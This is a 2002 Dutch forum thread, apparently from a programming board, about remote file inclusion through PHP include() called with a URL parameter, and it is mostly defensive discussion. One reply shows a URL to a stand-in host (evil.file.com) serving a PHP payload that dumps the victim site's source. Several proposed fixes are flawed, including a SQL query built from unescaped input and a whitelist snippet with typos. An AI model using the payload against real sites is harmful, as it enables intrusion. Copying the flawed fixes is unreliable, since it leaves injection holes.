Toon posts:

[php] is dit een bug van php of van de user? :)

Pagina: 1
Acties:

Verwijderd

Topicstarter
ik was vanavond weer eens aan het nadenken, en kwam tot de conclusie dat er best wel een domme fout in php zit (of in veel scripts online).
Er zijn namelijk veel sites die gebruik maken van een soort include principe.
een voorbeeldje:
PHP:
1
2
3
<?
include($pagina);
?>

Dit word bijv. aangeroepen met blaat.php?pagina=contact
alleen nou heb ik eens zitten na denken, en ben tot de conclusie gekomen, dat dit soort script dus 100% lek zijn!
denk je eens in, iemand loopt te klooien met je script en typt dit in:
http://jousite.nl/index.php?pagina=http://zijnwebsite/zijnscript.php
waarschijnlijk niet veel aan de hand, want php is serverside.
het script word dus op zijn host uitgevoerd.
maar als je ff doordenkt is het mogelijk om een .php file op een host te zetten die geen php ondersteunt.
dan word het script dus op de server van het victim uitgevoerd!
Nou wou ik jullie mening hierover.
is dit een bug in php, of in de user die dit gemaakt heeft?
het is natuurlijk makkelijk te verhelpen, maar toch, ik denk dat veel sites hierdoor getroffen kunnen worden!

edit: in de titel moet het is zijn ipv os |:(

  • tomato
  • Registratie: November 1999
  • Niet online
Dit is dus een typisch voorbeeld van een slecht doordacht ontwerp. Dit mag natuurlijk nooit voorkomen in een applicatie en dat hoeft ook zeker niet :)

Verwijderd

Topicstarter
zo denk ik er persoonlijk ook over.
maar veel mensen zijn het mij oneens :?

  • DusHmaniac
  • Registratie: Oktober 2001
  • Laatst online: 07-09-2022

DusHmaniac

Boe!

Waarom zou je zoiets ook gebruiken in je script? Er zijn toch echt wel veel betere manieren om een link naar een andere pagina op je site te maken. Toch zeker niet met een gebruikersoptie in een include! :Z

All your base are belong to Chuck Norris


Verwijderd

Topicstarter
toch nog veel grote sites die het gebruiken.
zo heb ik eergister leerlingen.com ingelicht over deze bug in hun site.

  • Orphix
  • Registratie: Februari 2000
  • Niet online
tja is dom dom dom

Verwijderd

mua je moet gewoon vanuit gaan dat je de input van de gebruik nooit nooit en noooit mot vertrouwen.

maakt niet uit via get, post of cookie nooit vertrouwen.

en helemaal niet in query's zorg dat je controleert dat hij alleen [a-z][A-Z][0-9] verzend.

  • HGM
  • Registratie: April 2000
  • Niet online

HGM

Op donderdag 14 februari 2002 02:08 schreef blasty het volgende:
toch nog veel grote sites die het gebruiken.
zo heb ik eergister leerlingen.com ingelicht over deze bug in hun site.
Toch hoop en denk ik dat niet 'veel grote sites' dit echt toepassen. Natuurlijk is leerlingen.com een leuke site, maar om deze nu onder de professionele sites te scharen??

Maar fout is t dat zal iedereen meteen inzien :)

  • nescafe
  • Registratie: Januari 2001
  • Laatst online: 21:16
waarom is er eigenlijk niet gekozen voor een request container/array zoals in asp/perl (Request("key") en ($ENV{'QUERY_STRING'}?

Of is het wel mogelijk om php te vertellen dat ie niet alle script.asp?key=name moet omtoveren naar $key = 'name'?

* Barca zweert ook bij fixedsys... althans bij mIRC de rest is comic sans


  • elnino
  • Registratie: Augustus 2001
  • Laatst online: 03-09 05:13
Op donderdag 14 februari 2002 09:04 schreef nescafe het volgende:
Of is het wel mogelijk om php te vertellen dat ie niet alle script.asp?key=name moet omtoveren naar $key = 'name'?
Dat kun je instellen in php.ini, te vinden in je windowsdirectory.

Daarnaast kun je beter $HTTP_POST/GET_VARS of $_POST/$_GET (vanaf versie 4.1.0) gebruiken.

  • Petuhr
  • Registratie: Juni 2000
  • Laatst online: 13-09 13:10

Petuhr

FreeBSD

Als je zo programmeert, dan ben je wel erg stom bezig.

  • elnino
  • Registratie: Augustus 2001
  • Laatst online: 03-09 05:13
Ik had laatst in een ander topic ook nog een vergelijking tussen alle mogelijke variabelen gemaakt. Ik zal deze hier ook nog eens posten:
  • $varnaam - Deze mag wat mij betreft meteen afgeschaft worden, anderen kunnen namelijk jouw variabelen veranderen buitenaf. Helaas nog veel gebruikt :(
  • $HTTP_POST/GET_VARS["varnaam"] - Is al een eind op de goede weg, wel een beetje lang en bovendien pas in latere versies van PHP ondersteund (Ja er zijn nog providers die nog PHP 3 hebben, helaas).
  • $_POST["varnaam"], $_GET["varnaam"] - Dit zijn de nieuwe global-variabelen van PHP. Helaas pas vanaf versie 4.1.0 ondersteund.
    Waarschuwing: Pas altijd op bij global-variabelen! Een functie heeft argumenten als input en een return als output en globals kunnen gevaarlijke dingen doen. Hou de variabelen dus binnen je eigen scope!
Ik vind het jammer dat er drie zijn, het geeft namelijk niet veel orde...
maar het is dan ook PHP

  • axis
  • Registratie: Juni 2000
  • Laatst online: 26-01-2023
In ASP kan dit dus al niet ;)

Two advices for network troubleshooting.. learn to draw diagrams in Visio, and THINK IN LAYERS!


  • Jorn
  • Registratie: Juni 2001
  • Laatst online: 13-09 12:30
Je kunt toch alleen een bestand includen dat op je eigen server staat?
Anders moet het toch met Fopen???

* Erkens is een sukkel en ramt in mirc op f5 :+
* XTerm GROOOOOOTE kuis houden op hd's :)


Verwijderd

Op donderdag 14 februari 2002 09:35 schreef j_iscool het volgende:
Je kunt toch alleen een bestand includen dat op je eigen server staat?
Anders moet het toch met Fopen???
nope, include("http://www.site.nl/index.html"), gaat prima.
k vind t alleen erg slordig van de programmeur van wie je de site include, als je dan op zo'n manier aan wachtwoorden etc kan komen.

  • Rense Klinkenberg
  • Registratie: November 2000
  • Laatst online: 09-08 19:19
Op donderdag 14 februari 2002 09:35 schreef j_iscool het volgende:
Je kunt toch alleen een bestand includen dat op je eigen server staat?
Anders moet het toch met Fopen???
Volgens http://www.php.net/include niet altijd:
If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using an URL (via HTTP) instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using an URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file's variable scope; the script is actually being run on the remote server and the result is then being included into the local script.
Je kan dus in sommige gevallen wel degelijk includes openen vanaf een andere server.

Verder vind ik die manier van includen gewoon te ranzig voor woorden. Los het dan op met een simpele array waarin alle beschikbare scriptjes staan:
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?
$pages = array();
$pages['home'] = 'home.php';
$pages['about'] = 'about.php';

if (isset($pages[ $_POST['page'] ])
{
    include 'includes' . $pages[ $_POST['page'] ];
}
else
{
    include 'includes' . $page['home'];
}
?>

  • Dryw.Filtiarn
  • Registratie: September 2001
  • Laatst online: 18-03 12:10
Op donderdag 14 februari 2002 09:35 schreef j_iscool het volgende:
Je kunt toch alleen een bestand includen dat op je eigen server staat?
Anders moet het toch met Fopen???
Nee hoor, als je een page op een andere server wilt includen is dat geen probleem.

=( Protected by witchcraft )=


  • Jorn
  • Registratie: Juni 2001
  • Laatst online: 13-09 12:30
Weer wat geleerd:):):)
Dan is het inderdaad heel slordig,
Ik had het zowiezo al met een header ofzo gedaan.

* Erkens is een sukkel en ramt in mirc op f5 :+
* XTerm GROOOOOOTE kuis houden op hd's :)


  • jan-marten
  • Registratie: September 2000
  • Laatst online: 14-09 08:34
Ipv include($page) kun je ook $page vervangen door de URL naar je eigen 'root' (of wat je gebruikt als base directory). $HTTP_HOST ofzo?

Als iemand hem dan oproept zoals jij dat zou doen dan gaat ie dus dit includen:

http://www.mijn.host/http://zijn.host.com/script

En wat krijg je? Je fijne PHP-error :) bouw daar fijn nog een error script omheen en je hebt heb het probleem met een eigen 404 pagina opgelost...

  • Anders
  • Registratie: December 2000
  • Laatst online: 24-08 18:29
Is inderdaad gewoon klunzig programmeren. Zo zijn er wel meer dingen waar "ondoordachte" programmeurs tegenaan lopen. Zie http://www.zend.com/zend/art/art-oertli.php voor een mooi lijstje daarvan, en zie tevens [topic=294247/1/999]

Ik spoor veilig of ik spoor niet.


  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

gewoon via een database doen. Beter te onderhouden en veel moeilijker te hacken.
code:
1
2
3
4
list ( $page ) = $sql->query ( "SELECT page FROM pages WHERE pageID='$pageID'" );
if ( !$page )
   Header ( "Location: pagenotfound.html" );
include ( $page );

zoiets

Ik heb sowieso een beetje een hekel aan include-structures maar goed, als je dat dan toch wilt gebruiken, zou ik het zo doen.
aanroepen met puntjepuntje.php?pageID=1 uiteraard :)

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


Verwijderd

Topicstarter
Jullie heb volkomen gelijk :)

  • Grum
  • Registratie: Juni 2001
  • Niet online
drm: vergeet de 'exit;' aub niet na de header. Anders kan men alsnog kloten >:)

  • Skef
  • Registratie: April 2001
  • Laatst online: 14-09 11:31

Skef

Ik scheer.me

Ik kreeg laatst bij dit:
PHP:
1
2
3
<?
@include('bestand.php?blaat=blaat');
?>

dat het gewoon niet geinclude werd, en als je de @ (fout-onderdrukker) weghaalt, zegt ie doodleuk dat ie nie kan includen...

Dus toen heb ik dit ervan gemaakt:
PHP:
1
2
3
4
5
<?
$blaat="blaat";
@include('bestand.php');
unset($blaat);
?>

Dat werkte in mijn geval voldoende...

"Computer games don’t affect kids: I mean if Pac-Man affected us as kids, we’d all be running around in darkened rooms, munching magic pills and listening to repetitive electronic music."


  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

Grum_:
drm: vergeet de 'exit;' aub niet na de header. Anders kan men alsnog kloten >:)
valt volgens mij reuze mee. Hoe dan?

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

Op donderdag 14 februari 2002 14:25 schreef Skef ook iets...
:?
Ik begrijp niet zo goed wat dat met het topic te maken heeft, maar goed...

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • Grum
  • Registratie: Juni 2001
  • Niet online
het is maar een header
dus als jij de page gewoon opvraagt mbv telnet zie je ook alles na de header

dat is
1/ zonde van de traffic
2/ mogelijk om dingen te zien die jij niet MAG zien

  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

ok daar heb je gelijk in.

Daarom ben ik mijn code altijd heel strict in if-then-else constructies. Dus ik zou het dan zo doen:
code:
1
2
3
4
5
6
if ( !$page )
   Header ( "..." );
else
{
   // meuk
}

Ik heb een hekel aan exit / die e.d. functies. Vraag me niet waarom, ik vind ze gewoon niet netjes...

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • Olaf van der Spek
  • Registratie: September 2000
  • Niet online
Op donderdag 14 februari 2002 01:45 schreef blasty het volgende:
het script word dus op zijn host uitgevoerd.
maar als je ff doordenkt is het mogelijk om een .php file op een host te zetten die geen php ondersteunt.
dan word het script dus op de server van het victim uitgevoerd!
Nou wou ik jullie mening hierover.
is dit een bug in php, of in de user die dit gemaakt heeft?
het is natuurlijk makkelijk te verhelpen, maar toch, ik denk dat veel sites hierdoor getroffen kunnen worden!
Dan wordt de PHP file gewoon gedownload en wordt er helemaal niets uitgevoerd.

  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

Gedownload door de webserver en geparsed. Zo werkt include nou eenmaal :)

Dus blasty heeft wel gelijk dat 't een lek is, maar het is gewoon brak gescript als je zo makkelijk kunt inbreken

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • Olaf van der Spek
  • Registratie: September 2000
  • Niet online
Oh, op die manier. Ik dacht dat hij bedoelde dat de PHP file met de include op een PHP-less server stond.

  • Postman
  • Registratie: Februari 2000
  • Laatst online: 14-09 01:25
Een simpele controle naar de referrer moet genoeg zijn. Dan kun je nog steeds gebruik maken van die stomme include manier.
Oh ja, wat blasty zegt klopt in versie 4.1.0 niet meer. Hier kun je geen variabelen met get of post meer faken. Je moet namelijk specifiek die variabele uitvragen.
PHP:
1
2
3
4
<?
$bla = "http://www.mijn.host";
include($bla);
?>

Die aanroepen met script.php?bla=http://www.jouw.host werkt dus niet meer.

  • Grum
  • Registratie: Juni 2001
  • Niet online
het kan wel maar dan moet je dat ZELF aanzetten ipv zoals eerst dat het default aan staat. De optie heet 'trackvars' meen ik

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

ik volg het niet helemaal.. kan iemand het wat duidelijker uitleggen?
want ik maak ook gebruik van
include("$file.php")
dan zou dat dus ook kwaad kunne??

maar wat bedoel je precies..
jij plaatst een php script op een host van jou, die geen php ondersteunt, zoals bijvoorbeeld geocities..

daarin zet jij dan
echo "aap";


of zo, en dat voert mijn host dan uit?? dus er komt dan in dit geval aap op mijn site te staan..
begrijp ik dat goed????

tjah..


  • Olaf van der Spek
  • Registratie: September 2000
  • Niet online
Op donderdag 14 februari 2002 15:53 schreef FlamerX het volgende:
Een simpele controle naar de referrer moet genoeg zijn. Dan kun je nog steeds gebruik maken van die stomme include manier.
Referer is extern, dus niet te vertrouwen.

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

olaf..?? XTF???

tjah..


  • Grum
  • Registratie: Juni 2001
  • Niet online
Op donderdag 14 februari 2002 16:02 schreef gizmo9003 het volgende:
ik volg het niet helemaal.. kan iemand het wat duidelijker uitleggen?
want ik maak ook gebruik van
include("$file.php")
dan zou dat dus ook kwaad kunne??

maar wat bedoel je precies..
jij plaatst een php script op een host van jou, die geen php ondersteunt, zoals bijvoorbeeld geocities..

daarin zet jij dan
echo "aap";

of zo, en dat voert mijn host dan uit?? dus er komt dan in dit geval aap op mijn site te staan..
begrijp ik dat goed????
jahoor dit kan zeer goed kwaad

als ik nu als url neem ?file=http://evil.file.com/file

en ik zet op http://evil.file.com/file.php neer die bijvoorbeeld dit uitpoept:
code:
1
2
3
4
5
6
<?

global $PHP_SELF;
@show_source($PHP_SELF);

?>

dan kan jan en alleman je source gewoon lezen :)

edit:
met deze code kom je er btw niet altijd .. en tis maar een voorbeeld

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

da vind ik dus niet leuk.....
maar moet ik dan van de 15 paginas die ik heb, allemaal in een if gooien?

if ($link == "pagina1")
{ include
}
ELSEIF ( ...


da is ook omslachtig.. hoe kan ik het dan het beste oplossen?

tjah..


  • Grum
  • Registratie: Juni 2001
  • Niet online
je kan het gewoon doen door alles in een assoc-array te stoppen en voorje de page opent even kijken of je wel een page opent die in die array staat (mbv in_array bv)

PS: gebruik es niet zoveel 'SELECT *'s :+

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

grum_, toch benieuwd hoe je dat klaar hebt gekreeg, want als ik bijv doe:

http://www.down4free.com/index.php?link=http://www.geocities.com/nldark/source

dan krijg ik:
Warning: Failed opening 'http://www.geocities.com/nldark/source.php' for inclusion (include_path='.:') in /usr/local/psa/home/vhosts/down4free.com/httpdocs/index.php on line 7

oftwel.. die neemt ie niet aan.. hoe doe jij het dan wel?

edit:

en die select * moek nog keer aanpassen, maar ben ik te lui voor :p

tjah..


  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

hehehe :)

jaja, gizmo, da's nou precies waar het om draait :)

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

(....) da = mij niet bevallende..


ff heeeeeel rap op gaan lossen :)

wie helpt? :P

tjah..


  • Grum
  • Registratie: Juni 2001
  • Niet online
ik help wel :)

  • Orphix
  • Registratie: Februari 2000
  • Niet online
Ik heb eigenlijk nog nooit zulke constructies gebruikt. Ik gebruik verschillende PHP bestanden, elk met hun eigen doel.
Ik vind
users.php?newuser=1&name=...&street=...
mooier dan
admin.php?action=newuser&name=...&street=...
en bovendien ook beter te onderhouden.

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

khep het tijdelijk ff opgelost met If lusjes...
zou iemand even willen testen of ie veilig is..
zou wel moeten als het goed is!!!

tjah..


  • Grum
  • Registratie: Juni 2001
  • Niet online
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
<?
include('head.php');
 
$theCheck = array('contacts', 'cdcovers', 'top25', 'freeware', 'search', 'winxp');
 
if(isset($file) &amp;&amp; in_array($file, $theCheck))
        include($file.'.php');
else
        include('main.php');
 
include('foot.php');
?>

should do the trick (als ik je index.php goed heb onthouden)

PS: nooit vragen of iemand het even kan controleren. Gewoon je source posten dan kunnen mensen nl direct ZIEN of er iets mogelijk is ipv domweg alles proberen. Scheelt tijd, frustratie en voor de volgende die de post lees isset meteen duidelijk.

  • gizmo9003
  • Registratie: November 2000
  • Laatst online: 13-09 22:06

gizmo9003

Go For It!

jah thanx.. ik ga het nou in een array gooien.. had het even simpel gedaan met if lusjes...

ll.com gebruikt het ook ja.. dat weet ik nog wel :p
maarja.. eigenlijk niet over nagedacht..

wel over dat ik toen ik daar nog werkte met include ook alles uit hogere directorys kon bekijken, maar ik dacht nooit verder dat je dat op deez manier ook vanaf andere server kon :p

tjah..


  • Olaf van der Spek
  • Registratie: September 2000
  • Niet online
Op donderdag 14 februari 2002 16:38 schreef Orphix het volgende:
Ik heb eigenlijk nog nooit zulke constructies gebruikt. Ik gebruik verschillende PHP bestanden, elk met hun eigen doel.
Ik vind een enkel bestand soms toch handiger. Dan hoef je de globale functies niet meerdere keren aan te roepen.

  • Grum
  • Registratie: Juni 2001
  • Niet online
mja ik code meestal zo dat de pages zo enorm op elkaar lijken dat het niet meer dan een

<?
require('standaard zooi');

// wat code

?>

word :)

  • drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

Met mijn <prespam>binnenkort te bezichtigen template parser</prespam> is het mogelijk om je complete site met 1 php pagina, wat includes, de templates en een grote database te draaien.

En er is imo niets beter te onderhouden dan een goed ontworpen database :)

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz


  • Anders
  • Registratie: December 2000
  • Laatst online: 24-08 18:29
Op donderdag 14 februari 2002 16:38 schreef Orphix het volgende:
Ik heb eigenlijk nog nooit zulke constructies gebruikt. Ik gebruik verschillende PHP bestanden, elk met hun eigen doel.
Ik vind
users.php?newuser=1&name=...&street=...
mooier dan
admin.php?action=newuser&name=...&street=...
en bovendien ook beter te onderhouden.
Ja, tot op zekere hoogte. Het is zo imho makkelijker om dingen in 1 keer te kopieren naar een volgend project zonder dat je overbodige code meesleept. Includes gebruik ik alleen voor functies, headers- en footers en voor code die ik never nooit niet meer verander, en niet voor allerlei deel-functionaliteit want dan raak ik het overzicht kwijt.

Het moet ook weer niet te weg worden. Ik ken iemand die voor elke functie (aanmaken van een user, wijzigen van een user, verwijderen van een user) aparte bestanden maakt, en dan heb je dus een directory vol onnodig kleine bestandjes. add/edit/delete zijn bv. dingen die onlosmakelijk met elkaar verbonden zijn en dat hoort imho dus weer thuis in 1 bestand.

Om alles in 1 bestand te gooien vind ik ook weer niks. Dan moet je vaak weer zo generiek gaan denken dat de tijd die je daarin gaat zitten bijna niet terug te winnen is. Zoiets doe je vooral uit perfectionisme, niet uit efficiëntie. Lijkt mij.

Ik spoor veilig of ik spoor niet.


  • Genoil
  • Registratie: Maart 2000
  • Laatst online: 12-11-2023
Op donderdag 14 februari 2002 09:39 schreef DarthRaider het volgende:

[..]

nope, include("http://www.site.nl/index.html"), gaat prima.
k vind t alleen erg slordig van de programmeur van wie je de site include, als je dan op zo'n manier aan wachtwoorden etc kan komen.
waarom werkt dit mij dan niet? hij zeurt gewoon standaard om het include path dat ni goed is...dit is al eerder gevraagd, maar helaas nog geen antwoord...d'r is vast iemand die dit aan een security-mongool als ik uit kan leggen...

  • Grum
  • Registratie: Juni 2001
  • Niet online
wat er uit die html pagina komt moet gewoon php zijn (of plain html maar dan boeitet niet) als er gewoon php uit komt kan je de code dus gewoon lezen (het moet dus niet preparsed zijn want dan werktet gewoon niet)

Elk beetje wat iemand te weten komt over hoe je page in elkaar zit terwijl dat niet de bedoeling is is per definitie SLECHT :)

  • MikeN
  • Registratie: April 2001
  • Laatst online: 13-09 17:41
Op donderdag 14 februari 2002 20:29 schreef Genoil het volgende:

[..]

waarom werkt dit mij dan niet? hij zeurt gewoon standaard om het include path dat ni goed is...dit is al eerder gevraagd, maar helaas nog geen antwoord...d'r is vast iemand die dit aan een security-mongool als ik uit kan leggen...
Mogelijkheid 1:
http://www.php.net/manual/en/function.fopen.php
Versions prior to PHP 4.0.5 do not handle HTTP redirects. Because of this, directories must include trailing slashes.
Mogelijkheid 2:
http://www.php.net/manual/en/configuration.php#ini.allow-url-fopen

Mogelijkheid 3:
http://www.php.net/manual/en/install.configure.php#install.configure.disable-url-fopen-wrapper
Pagina: 1